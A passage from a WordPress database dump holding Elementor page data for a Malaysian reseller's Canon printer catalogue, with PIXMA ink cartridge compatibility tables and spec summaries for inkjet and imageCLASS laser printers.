width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7024,3317,'_wp_page_template','template-fullwidth.php'),(7025,3317,'_elementor_edit_mode','builder'),(7026,3317,'_elementor_template_type','post'),(7028,3317,'_elementor_version','2.5.14'),(7035,3318,'_elementor_version','2.5.14'),(7049,3320,'_elementor_version','2.5.14'),(7063,3322,'_elementor_version','2.5.14'),(7077,3324,'_elementor_version','2.5.14'),(7084,3325,'_elementor_version','2.5.14'),(7087,3326,'_wp_page_template','template-fullwidth.php'),(7088,3326,'_elementor_edit_mode','builder'),(7089,3326,'_elementor_template_type','post'),(7090,3326,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS 